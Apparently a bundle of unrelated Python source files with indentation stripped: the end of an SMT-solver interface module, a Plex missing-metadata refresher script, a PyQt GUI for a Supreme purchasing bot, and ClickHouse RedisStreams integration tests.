print("< %s" % line)
if count_brackets == 0:
break
if self.solver != "dummy" and self.p.poll():
print("%s Solver terminated unexpectedly: %s" % (self.timestamp(), "".join(stmt)), flush=True)
sys.exit(1)
stmt = "".join(stmt)
if stmt.startswith("(error"):
print("%s Solver Error: %s" % (self.timestamp(), stmt), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return stmt
def check_sat(self):
if self.debug_print:
print("> (check-sat)")
if self.debug_file and not self.nocomments:
print("; running check-sat..", file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None:
self.p_close()
self.p_open()
for cache_ctx in self.smt2cache:
for cache_stmt in cache_ctx:
self.p_write(cache_stmt + "\n", False)
self.p_write("(check-sat)\n", True)
if self.timeinfo:
i = 0
s = "/-\|"
count = 0
num_bs = 0
while self.p_poll():
count += 1
if count < 25:
continue
if count % 10 == 0 or count == 25:
secs = count // 10
if secs < 60:
m = "(%d seconds)" % secs
elif secs < 60*60:
m = "(%d seconds -- %d:%02d)" % (secs, secs // 60, secs % 60)
else:
m = "(%d seconds -- %d:%02d:%02d)" % (secs, secs // (60*60), (secs // 60) % 60, secs % 60)
print("%s %s %c" % ("\b \b" * num_bs, m, s[i]), end="", file=sys.stderr)
num_bs = len(m) + 3
else:
print("\b" + s[i], end="", file=sys.stderr)
sys.stderr.flush()
i = (i + 1) % len(s)
if num_bs != 0:
print("\b \b" * num_bs, end="", file=sys.stderr)
sys.stderr.flush()
else:
count = 0
while self.p_poll(60):
count += 1
msg = None
if count == 1:
msg = "1 minute"
elif count in [5, 10, 15, 30]:
msg = "%d minutes" % count
elif count == 60:
msg = "1 hour"
elif count % 60 == 0:
msg = "%d hours" % (count // 60)
if msg is not None:
print("%s waiting for solver (%s)" % (self.timestamp(), msg), flush=True)
result = self.read()
if self.debug_file:
print("(set-info :status %s)" % result, file=self.debug_file)
print("(check-sat)", file=self.debug_file)
self.debug_file.flush()
if result not in ["sat", "unsat"]:
if result == "":
print("%s Unexpected EOF response from solver." % (self.timestamp()), flush=True)
else:
print("%s Unexpected response from solver: %s" % (self.timestamp(), result), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return result
def parse(self, stmt):
def worker(stmt):
if stmt[0] == '(':
expr = []
cursor = 1
while stmt[cursor] != ')':
el, le = worker(stmt[cursor:])
expr.append(el)
cursor += le
return expr, cursor+1
if stmt[0] == '|':
expr = "|"
cursor = 1
while stmt[cursor] != '|':
expr += stmt[cursor]
cursor += 1
expr += "|"
return expr, cursor+1
if stmt[0] in [" ", "\t", "\r", "\n"]:
el, le = worker(stmt[1:])
return el, le+1
expr = ""
cursor = 0
while stmt[cursor] not in ["(", ")", "|", " ", "\t", "\r", "\n"]:
expr += stmt[cursor]
cursor += 1
return expr, cursor
return worker(stmt)[0]
def unparse(self, stmt):
if isinstance(stmt, list):
return "(" + " ".join([self.unparse(s) for s in stmt]) + ")"
return stmt
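# Example: parse("(get-value (x))") returns ["get-value", ["x"]], and
# unparse(["get-value", ["x"]]) produces "(get-value (x))" again.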
def bv2hex(self, v):
h = ""
v = self.bv2bin(v)
while len(v) > 0:
d = 0
if len(v) > 0 and v[-1] == "1": d += 1
if len(v) > 1 and v[-2] == "1": d += 2
if len(v) > 2 and v[-3] == "1": d += 4
if len(v) > 3 and v[-4] == "1": d += 8
h = hex(d)[2:] + h
if len(v) < 4: break
v = v[:-4]
return h
def bv2bin(self, v):
if type(v) is list and len(v) == 3 and v[0] == "_" and v[1].startswith("bv"):
x, n = int(v[1][2:]), int(v[2])
return "".join("1" if (x & (1 << i)) else "0" for i in range(n-1, -1, -1))
if v == "true": return "1"
if v == "false": return "0"
if v.startswith("#b"):
return v[2:]
if v.startswith("#x"):
return "".join(hex_dict.get(x) for x in v[2:])
assert False
def bv2int(self, v):
return int(self.bv2bin(v), 2)
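# Examples: bv2bin("#x2A") -> "00101010", bv2hex("#b1010") -> "a",
# bv2int("#b1010") -> 10.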
def get(self, expr):
self.write("(get-value (%s))" % (expr))
return self.parse(self.read())[0][1]
def get_list(self, expr_list):
if len(expr_list) == 0:
return []
self.write("(get-value (%s))" % " ".join(expr_list))
return [n[1] for n in self.parse(self.read())]
def get_path(self, mod, path):
assert mod in self.modinfo
path = path.split(".")
for i in range(len(path)-1):
first = ".".join(path[0:i+1])
second = ".".join(path[i+1:])
if first in self.modinfo[mod].cells:
nextmod = self.modinfo[mod].cells[first]
return [first] + self.get_path(nextmod, second)
return [".".join(path)]
def net_expr(self, mod, base, path):
if len(path) == 0:
return base
if len(path) == 1:
assert mod in self.modinfo
if path[0] == "":
return base
if path[0] in self.modinfo[mod].cells:
return "(|%s_h %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].wsize:
return "(|%s_n %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].memories:
return "(|%s_m %s| %s)" % (mod, path[0], base)
assert 0
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.net_expr(nextmod, nextbase, path[1:])
def net_width(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
assert net_path[-1] in self.modinfo[mod].wsize
return self.modinfo[mod].wsize[net_path[-1]]
def net_clock(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
if net_path[-1] not in self.modinfo[mod].clocks:
return None
return self.modinfo[mod].clocks[net_path[-1]]
def net_exists(self, mod, net_path):
for i in range(len(net_path)-1):
if mod not in self.modinfo: return False
if net_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[net_path[i]]
if mod not in self.modinfo: return False
if net_path[-1] not in self.modinfo[mod].wsize: return False
return True
def mem_exists(self, mod, mem_path):
for i in range(len(mem_path)-1):
if mod not in self.modinfo: return False
if mem_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[mem_path[i]]
if mod not in self.modinfo: return False
if mem_path[-1] not in self.modinfo[mod].memories: return False
return True
def mem_expr(self, mod, base, path, port=None, infomode=False):
if len(path) == 1:
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].memories
if infomode:
return self.modinfo[mod].memories[path[0]]
return "(|%s_m%s %s| %s)" % (mod, "" if port is None else ":%s" % port, path[0], base)
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.mem_expr(nextmod, nextbase, path[1:], port=port, infomode=infomode)
def mem_info(self, mod, path):
return self.mem_expr(mod, "", path, infomode=True)
def get_net(self, mod_name, net_path, state_name):
return self.get(self.net_expr(mod_name, state_name, net_path))
def get_net_list(self, mod_name, net_path_list, state_name):
return self.get_list([self.net_expr(mod_name, state_name, n) for n in net_path_list])
def get_net_hex(self, mod_name, net_path, state_name):
return self.bv2hex(self.get_net(mod_name, net_path, state_name))
def get_net_hex_list(self, mod_name, net_path_list, state_name):
return [self.bv2hex(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def get_net_bin(self, mod_name, net_path, state_name):
return self.bv2bin(self.get_net(mod_name, net_path, state_name))
def get_net_bin_list(self, mod_name, net_path_list, state_name):
return [self.bv2bin(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def wait(self):
if self.p is not None:
self.p.wait()
self.p_close()
class SmtOpts:
def __init__(self):
self.shortopts = "s:S:v"
self.longopts = ["unroll", "noincr", "noprogress", "dump-smt2=", "logic=", "dummy=", "info=", "nocomments"]
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.unroll = False
self.noincr = False
self.timeinfo = os.name != "nt"
self.logic = None
self.info_stmts = list()
self.nocomments = False
def handle(self, o, a):
if o == "-s":
self.solver = a
elif o == "-S":
self.solver_opts.append(a)
elif o == "-v":
self.debug_print = True
elif o == "--unroll":
self.unroll = True
elif o == "--noincr":
self.noincr = True
elif o == "--noprogress":
self.timeinfo = False
elif o == "--dump-smt2":
self.debug_file = open(a, "w")
elif o == "--logic":
self.logic = a
elif o == "--dummy":
self.dummy_file = a
elif o == "--info":
self.info_stmts.append(a)
elif o == "--nocomments":
self.nocomments = True
else:
return False
return True
def helpmsg(self):
return """
-s <solver>
set SMT solver: z3, yices, boolector, cvc4, mathsat, dummy
default: yices
-S <opt>
pass <opt> as command line argument to the solver
--logic <smt2_logic>
use the specified SMT2 logic (e.g. QF_AUFBV)
--dummy <filename>
if solver is "dummy", read solver output from that file
otherwise: write solver output to that file
-v
enable debug output
--unroll
unroll uninterpreted functions
--noincr
don't use incremental solving, instead restart solver for
each (check-sat). This also avoids (push) and (pop).
--noprogress
disable timer display during solving
(this option is set implicitly on Windows)
--dump-smt2 <filename>
write smt2 statements to file
--info <smt2-info-stmt>
include the specified smt2 info statement in the smt2 output
--nocomments
strip all comments from the generated smt2 code
"""
class MkVcd:
def __init__(self, f):
self.f = f
self.t = -1
self.nets = dict()
self.clocks = dict()
def add_net(self, path, width):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, width)
def add_clock(self, path, edge):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, 1)
self.clocks[path] = (key, edge)
def set_net(self, path, bits):
path = tuple(path)
assert self.t >= 0
assert path in self.nets
if path not in self.clocks:
print("b%s %s" % (bits, self.nets[path][0]), file=self.f)
def escape_name(self, name):
name = re.sub(r"\[([0-9a-zA-Z_]*[a-zA-Z_][0-9a-zA-Z_]*)\]", r"<\1>", name)
if re.match("[\[\]]", name) and name[0] != "\\":
name = "\\" + name
return name
def set_time(self, t):
assert t >= self.t
if t != self.t:
if self.t == -1:
print("$var integer 32 t smt_step $end", file=self.f)
print("$var event 1 ! smt_clock $end", file=self.f)
scope = []
for path in sorted(self.nets):
key, width = self.nets[path]
uipath = list(path)
if "." in uipath[-1]:
uipath = uipath[0:-1] + uipath[-1].split(".")
for i in range(len(uipath)):
uipath[i] = re.sub(r"\[([^\]]*)\]", r"<\1>", uipath[i])
while uipath[:len(scope)] != scope:
print("$upscope $end", file=self.f)
scope = scope[:-1]
while uipath[:-1] != scope:
print("$scope module %s $end" % uipath[len(scope)], file=self.f)
scope.append(uipath[len(scope)])
if path in self.clocks and self.clocks[path][1] == "event":
print("$var event 1 %s %s $end" % (key, uipath[-1]), file=self.f)
else:
print("$var wire %d %s %s $end" % (width, key, uipath[-1]), file=self.f)
for i in range(len(scope)):
print("$upscope $end", file=self.f)
print("$enddefinitions $end", file=self.f)
self.t = t
assert self.t >= 0
if self.t > 0:
print("#%d" % (10 * self.t - 5), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "posedge":
print("b0 %s" % self.nets[path][0], file=self.f)
elif self.clocks[path][1] == "negedge":
print("b1 %s" % self.nets[path][0], file=self.f)
print("#%d" % (10 * self.t), file=self.f)
print("1!", file=self.f)
print("b%s t" % format(self.t, "032b"), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "negedge":
print("b0 %s" % self.nets[path][0], file=self.f)
else:
print("b1 %s" % self.nets[path][0], file=self.f)
|
plex_missing_metadata_refresher.py
|
#!/usr/bin/env python3
# This needs a specific fork+branch of plexapi till it's merged upstream:
# pip3 install --force -U --user
# git+git://github.com/darthShadow/python-plexapi@temp-guids-split
import time
import logging
import multiprocessing
import plexapi
import plexapi.server
import plexapi.exceptions
BATCH_SIZE = 100
PLEX_URL = "http://<plex_ip>:32400"
PLEX_TOKEN = "<plex_token>"
PLEX_REQUESTS_SLEEP = 0
SKIP_SECTIONS = {
"Movies": False,
"Movies - 4K": False,
"Movies - 4K DV": False,
"Movies - Anime": False,
"TV Shows": False,
"TV Shows - 4K": False,
"TV Shows - Asian": False,
"TV Shows - Anime": False,
"Audiobooks": True,
"Courses": True,
"Fitness": True,
"Sports": True,
}
MOVIE_SECTIONS = [
"Movies",
"Movies - 4K",
"Movies - 4K DV",
"Movies - Anime",
]
TV_SECTIONS_1 = [
"TV Shows",
]
TV_SECTIONS_2 = [
"TV Shows - 4K",
"TV Shows - Anime",
"TV Shows - Asian",
]
MISC_SECTIONS = [
"Audiobooks",
"Courses",
"Sports",
]
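# Each of the section groups above is handled by its own worker process in
# main() so the movie, TV and misc libraries are scanned in parallel.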
LOG_FORMAT = \
"[%(name)s][%(process)05d][%(asctime)s][%(levelname)-8s][%(funcName)-15s]"\
" %(message)s"
LOG_DATE_FORMAT = "%Y-%m-%dT%H:%M:%SZ"
LOG_LEVEL = logging.INFO
LOG_FILE = "/home/<username>/scripts/plex-missing-metadata-refresher.log"
plexapi.server.TIMEOUT = 3600
plexapi.server.X_PLEX_CONTAINER_SIZE = 500
# refresh_queue = multiprocessing.Manager().Queue()
logger = logging.getLogger("PlexMetadataRefresher")
def _item_iterator(plex_section, start, batch_size):
items = plex_section.search(
container_start=start,
maxresults=batch_size,
)
for item in items:
item.reload(checkFiles=True)
yield item
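# _batch_get pages through the section in BATCH_SIZE chunks; every item is
# reloaded with checkFiles=True so media and bitrate details are populated
# before the missing-metadata checks run.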
def _batch_get(plex_section, batch_size):
start = 0
while True:
if start >= plex_section.totalSize:
break
yield from _item_iterator(plex_section, start, batch_size)
start += batch_size
def _refresh_items(section, missing_metadata_items,
total_missing_metadata_items, analyze=True):
logger.info(f"Section : {section} | Refreshing Items with Missing "
"Metadata")
for item_index, item in enumerate(missing_metadata_items):
logger.info(f"[ {item_index + 1: >5} / "
f"{total_missing_metadata_items: >5} ] "
f"Section : {section} | Title : {item.title} | Refreshing")
try:
item.refresh()
if analyze:
item.analyze()
except plexapi.exceptions.BadRequest:
logger.exception(f"Refreshing Item : {item.title} ({item.year})")
except plexapi.exceptions.NotFound:
logger.exception(f"Refreshing Item : {item.title} ({item.year})")
except plexapi.exceptions.PlexApiException:
logger.exception(f"Refreshing Item : {item.title} ({item.year})")
except Exception:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
finally:
time.sleep(PLEX_REQUESTS_SLEEP)
time.sleep(60)
def _refresh_missing_movie_section(section):
skip_section = SKIP_SECTIONS.get(section, False)
if skip_section:
return
plex = plexapi.server.PlexServer(PLEX_URL, PLEX_TOKEN, timeout=300)
plex_section = plex.library.section(section)
total_items = plex_section.totalSize
missing_metadata_items = []
for item in _batch_get(plex_section, BATCH_SIZE):
try:
if not item.thumb or len(item.guids) == 0 or len(item.media) == 0 \
or item.media[0].bitrate == 0:
logger.info(f"Metadata Missing for Item : {item.title}"
f" ({item.year})")
missing_metadata_items.append(item)
except plexapi.exceptions.BadRequest:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
missing_metadata_items.append(item)
except plexapi.exceptions.NotFound:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
except plexapi.exceptions.PlexApiException:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
except Exception:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
finally:
time.sleep(PLEX_REQUESTS_SLEEP)
total_missing_metadata_items = len(missing_metadata_items)
logger.info(
f"Section : {section} | Total Items : {total_items} | "
f"Items with Missing Metadata : {total_missing_metadata_items}"
)
_refresh_items(section, missing_metadata_items,
total_missing_metadata_items)
time.sleep(900)
def _refresh_missing_tv_section(section):
skip_section = SKIP_SECTIONS.get(section, False)
if skip_section:
return
plex = plexapi.server.PlexServer(PLEX_URL, PLEX_TOKEN, timeout=300)
plex_section = plex.library.section(section)
total_items = plex_section.totalSize
missing_metadata_items = []
for item in _batch_get(plex_section, BATCH_SIZE):
missing_metadata = False
try:
if not item.thumb:
missing_metadata = True
for episode in item.episodes():
if not episode.thumb or len(episode.media) == 0 or \
episode.media[0].bitrate == 0:
missing_metadata = True
logger.debug(f"Metadata Missing for Episode :"
f" {episode.title}")
except plexapi.exceptions.BadRequest:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
missing_metadata = True
except plexapi.exceptions.NotFound:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
except plexapi.exceptions.PlexApiException:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
except Exception:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
finally:
time.sleep(PLEX_REQUESTS_SLEEP)
if missing_metadata:
logger.info(f"Metadata Missing for Item : {item.title}"
f" ({item.year})")
missing_metadata_items.append(item)
total_missing_metadata_items = len(missing_metadata_items)
logger.info(
f"Section : {section} | Total Items : {total_items} | "
f"Items with Missing Metadata : {total_missing_metadata_items}"
)
_refresh_items(section, missing_metadata_items,
total_missing_metadata_items)
time.sleep(900)
def _refresh_missing_misc_section(section):
skip_section = SKIP_SECTIONS.get(section, False)
if skip_section:
return
plex = plexapi.server.PlexServer(PLEX_URL, PLEX_TOKEN, timeout=300)
plex_section = plex.library.section(section)
total_items = plex_section.totalSize
missing_thumb_items = []
for item in _batch_get(plex_section, BATCH_SIZE):
try:
if not item.thumb:
logger.info(f"Metadata Missing for Item : {item.title}")
missing_thumb_items.append(item)
except plexapi.exceptions.BadRequest:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
missing_thumb_items.append(item)
except plexapi.exceptions.NotFound:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
except plexapi.exceptions.PlexApiException:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
except Exception:
logger.exception(f"Fetching Item : {item.title} ({item.year})")
finally:
time.sleep(PLEX_REQUESTS_SLEEP)
total_missing_thumb_items = len(missing_thumb_items)
logger.info(f"Section : {section} | Total Items : {total_items} | "
f"Items with Missing Thumbs : {total_missing_thumb_items}")
_refresh_items(section, missing_thumb_items, total_missing_thumb_items,
analyze=False)
time.sleep(900)
def _setup_logger():
logging.Formatter.converter = time.gmtime
logging.raiseExceptions = False
logger.setLevel(logging.DEBUG)
logger.handlers = []
logger.propagate = False
detailed_formatter = logging.Formatter(fmt=LOG_FORMAT,
datefmt=LOG_DATE_FORMAT)
file_handler = logging.FileHandler(filename=LOG_FILE, mode="a+")
file_handler.setFormatter(detailed_formatter)
file_handler.setLevel(LOG_LEVEL)
logger.addHandler(file_handler)
def _refresh_movie_sections():
for section in MOVIE_SECTIONS:
_refresh_missing_movie_section(section)
def _refresh_tv_sections_1():
for section in TV_SECTIONS_1:
_refresh_missing_tv_section(section)
def _refresh_tv_sections_2():
for section in TV_SECTIONS_2:
_refresh_missing_tv_section(section)
def _refresh_misc_sections():
for section in MISC_SECTIONS:
_refresh_missing_misc_section(section)
#
#
# def _metadata_refresher():
# while True:
# item = refresh_queue.get()
# if item is None:
# break
# time.sleep(1)
def main():
_setup_logger()
producer_process_list = [
multiprocessing.Process(target=_refresh_tv_sections_1, args=()),
multiprocessing.Process(target=_refresh_tv_sections_2, args=()),
multiprocessing.Process(target=_refresh_misc_sections, args=()),
multiprocessing.Process(target=_refresh_movie_sections, args=()),
]
#
# consumer_process_list = [
# multiprocessing.Process(target=_metadata_refresher, args=()),
# ]
for idx, process in enumerate(producer_process_list):
print("Started Worker ::: {0}".format(idx + 1))
process.start()
#
# for idx, process in enumerate(consumer_process_list):
# print("Started Refresh Item Consumer ::: {0}".format(idx + 1))
# process.start()
for process in producer_process_list:
process.join()
# refresh_queue.put(None)
#
# for process in consumer_process_list:
# process.join()
if __name__ == "__main__":
main()
|
supreme_app.py
|
#!/usr/bin/python3
# Zachary Weeden 2018
import sys
import threading
from PyQt4 import QtGui
from supreme_3 import SupremeProduct
class SupremeWidget(QtGui.QWidget):
def __init__(self, user_config_dict):
"""
Constructor for GUI widget
"""
super(SupremeWidget, self).__init__()
# This is all our billing/shipping info
self.user_config_dict = user_config_dict
# layout stuff
# TODO also include config information here - billing, etc.
self.product_name_label = QtGui.QLabel(self)
self.product_name_label.setText('Product 1 name:')
self.product_name_field = QtGui.QLineEdit(self)
self.product_2_name_label = QtGui.QLabel(self)
self.product_2_name_label.setText('Product 2 name:')
self.product_2_name_field = QtGui.QLineEdit(self)
self.product_3_name_label = QtGui.QLabel(self)
self.product_3_name_label.setText('Product 3 name:')
self.product_3_name_field = QtGui.QLineEdit(self)
self.product_color_label = QtGui.QLabel(self)
self.product_color_label.setText('Product 1 color:')
self.product_color_field = QtGui.QLineEdit(self)
self.product_2_color_label = QtGui.QLabel(self)
self.product_2_color_label.setText('Product 2 color:')
self.product_2_color_field = QtGui.QLineEdit(self)
self.product_3_color_label = QtGui.QLabel(self)
self.product_3_color_label.setText('Product 3 color:')
self.product_3_color_field = QtGui.QLineEdit(self)
self.product_size_label = QtGui.QLabel(self)
self.product_size_label.setText('Product 1 size:')
self.product_size_field = QtGui.QLineEdit(self)
self.product_2_size_label = QtGui.QLabel(self)
self.product_2_size_label.setText('Product 2 size:')
self.product_2_size_field = QtGui.QLineEdit(self)
self.product_3_size_label = QtGui.QLabel(self)
self.product_3_size_label.setText('Product 3 size:')
self.product_3_size_field = QtGui.QLineEdit(self)
self.product_quantity_label = QtGui.QLabel(self)
self.product_quantity_label.setText('Product 1 quantity:')
self.product_quantity_field = QtGui.QLineEdit(self)
self.product_2_quantity_label = QtGui.QLabel(self)
self.product_2_quantity_label.setText('Product 2 quantity:')
self.product_2_quantity_field = QtGui.QLineEdit(self)
self.product_3_quantity_label = QtGui.QLabel(self)
self.product_3_quantity_label.setText('Product 3 quantity:')
self.product_3_quantity_field = QtGui.QLineEdit(self)
self.submit_button = QtGui.QPushButton("Submit")
self.exit_button = QtGui.QPushButton("Exit")
grid = QtGui.QGridLayout()
grid.setSpacing(20)
grid.addWidget(self.product_name_label, 1, 0)
grid.addWidget(self.product_name_field, 2, 0)
grid.addWidget(self.product_2_name_label, 1, 1)
grid.addWidget(self.product_2_name_field, 2, 1)
grid.addWidget(self.product_3_name_label, 1, 2)
grid.addWidget(self.product_3_name_field, 2, 2)
grid.addWidget(self.product_color_label, 3, 0)
grid.addWidget(self.product_color_field, 4, 0)
grid.addWidget(self.product_2_color_label, 3, 1)
grid.addWidget(self.product_2_color_field, 4, 1)
grid.addWidget(self.product_3_color_label, 3, 2)
grid.addWidget(self.product_3_color_field, 4, 2)
grid.addWidget(self.product_size_label, 5, 0)
grid.addWidget(self.product_size_field, 6, 0)
grid.addWidget(self.product_2_size_label, 5, 1)
grid.addWidget(self.product_2_size_field, 6, 1)
grid.addWidget(self.product_3_size_label, 5, 2)
grid.addWidget(self.product_3_size_field, 6, 2)
grid.addWidget(self.product_quantity_label, 7, 0)
grid.addWidget(self.product_quantity_field, 8, 0)
grid.addWidget(self.product_2_quantity_label, 7, 1)
grid.addWidget(self.product_2_quantity_field, 8, 1)
grid.addWidget(self.product_3_quantity_label, 7, 2)
grid.addWidget(self.product_3_quantity_field, 8, 2)
grid.addWidget(self.submit_button, 9, 0)
grid.addWidget(self.exit_button, 9, 2)
self.field_elements = {
self.product_name_field:{
'color': self.product_color_field,
'size': self.product_size_field,
'quantity': self.product_quantity_field
},
self.product_2_name_field: {
'color': self.product_2_color_field,
'size': self.product_2_size_field,
'quantity': self.product_2_quantity_field
},
self.product_3_name_field: {
'color': self.product_3_color_field,
'size': self.product_3_size_field,
'quantity': self.product_3_quantity_field
}
}
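# Map each product-name field to its companion color/size/quantity fields so
# set_all() can iterate over the three product slots generically.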
# slots
self.submit_button.clicked.connect(lambda: self.set_all())
self.exit_button.clicked.connect(lambda: self.exit())
self.setLayout(grid)
self.setGeometry(300, 300, 350, 300)
self.setWindowTitle('Supreme')
self.show()
def set_all(self):
# TODO Set class attributes for this product search and clear fields for next item
# TODO Allow for concurrent searches and display background tasks
for product_field in self.field_elements:
if product_field.text() == '':
print('Name not given for this product - skipping')
continue
self.product_name = product_field.text()
self.product_color = self.field_elements[product_field]['color'].text()
self.product_size = self.field_elements[product_field]['size'].text()
self.product_quantity = int(self.field_elements[product_field]['quantity'].text())
product_thread = threading.Thread(target=SupremeProduct, args=(self.product_name, self.product_color, self.product_size, self.product_quantity, self.user_config_dict,))
print(f'[[ Thread ]] {str(self.product_name)} :: {str(self.product_size)} :: {str(self.product_color)} :: {str(self.product_quantity)} :: Thread initialized!')
product_thread.start()
def exit(self):
"""
Exit logic used when exit button pressed on gui
:return:
"""
print('State: Exiting')
sys.exit()
def main():
"""
Entry point for the Supreme desktop GUI.
:return:
"""
app = QtGui.QApplication(sys.argv)
# SupremeWidget requires billing/shipping details; an empty placeholder dict
# is used here and should be filled with real user configuration values.
user_config_dict = {}
supremeWidget = SupremeWidget(user_config_dict)
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
test.py
|
import json
import os.path as p
import random
import subprocess
import threading
import logging
import time
from random import randrange
import math
import redis
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster, check_redis_is_available
from helpers.test_tools import TSV
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance(
"instance",
main_configs=[
"configs/macros.xml",
"configs/redis.xml",
"configs/named_collection.xml",
],
user_configs=["configs/users.xml"],
with_redis=True
)
# Helpers
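# redis_check_result compares TSV query output against a reference file; with
# check=True it asserts equality, otherwise it returns a bool for polling loops.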
def redis_check_result(result, check=False, ref_file="test_redis_json.reference"):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
def wait_redis_to_start(redis_docker_id, timeout=180, throw=True):
start = time.time()
while time.time() - start < timeout:
try:
if check_redis_is_available(redis_docker_id):
logging.debug("Redis is available")
return
time.sleep(0.5)
except Exception as ex:
logging.debug("Can't connect to Redis " + str(ex))
time.sleep(0.5)
# Honour the 'throw' flag: fail loudly if Redis never became available.
if throw:
raise RuntimeError("Redis did not become available within {} seconds".format(timeout))
def kill_redis(redis_id):
p = subprocess.Popen(("docker", "stop", redis_id), stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def revive_redis(redis_id):
p = subprocess.Popen(("docker", "start", redis_id), stdout=subprocess.PIPE)
p.communicate()
wait_redis_to_start(redis_id)
# Fixtures
@pytest.fixture(scope="module")
def redis_cluster():
try:
cluster.start()
logging.debug("redis_id is {}".format(instance.cluster.redis_docker_id))
instance.query("CREATE DATABASE test")
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def redis_setup_teardown():
print("redis is available - running test")
yield # run test
instance.query("DROP DATABASE test NO DELAY")
instance.query("CREATE DATABASE test")
# Tests
def test_redis_select(redis_cluster):
stream_name = 'select'
group_name = 'test_select'
connection = redis.Redis(host=redis_cluster.redis_ip, port=cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
for i in range(50):
connection.xadd(stream_name, {"key": i, "value": i})
# The order of messages in select * from test.redis is not guaranteed, so sleep to collect everything in one select
connection.close()
time.sleep(1)
result = ""
while True:
result += instance.query(
"SELECT * FROM test.redis ORDER BY key", ignore_error=True
)
if redis_check_result(result):
break
redis_check_result(result, True)
def test_redis_select_empty(redis_cluster):
stream_name = 'empty'
group_name = 'test_empty'
connection = redis.Redis(redis_cluster.redis_ip, port=cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
connection.close()
assert int(instance.query("SELECT count() FROM test.redis")) == 0
def test_redis_macros(redis_cluster):
stream_name = 'macro'
group_name = 'test_macro'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{redis_broker}',
redis_stream_list = '{redis_stream_list}',
redis_group_name = '{redis_group_name}';
"""
)
for i in range(50):
connection.xadd(stream_name, {"key": i, "value": i})
connection.close()
time.sleep(1)
result = ""
while True:
result += instance.query(
"SELECT * FROM test.redis ORDER BY key", ignore_error=True
)
if redis_check_result(result):
break
redis_check_result(result, True)
def test_redis_materialized_view(redis_cluster):
stream_name = 'mv'
group_name = 'test_mv'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.redis;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
            SELECT * FROM test.redis GROUP BY (key, value);
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
for i in range(50):
connection.xadd(stream_name, {"key": i, "value": i})
time_limit_sec = 60
deadline = time.monotonic() + time_limit_sec
result = None
while time.monotonic() < deadline:
result = instance.query("SELECT * FROM test.view ORDER BY key")
if redis_check_result(result):
break
redis_check_result(result, True)
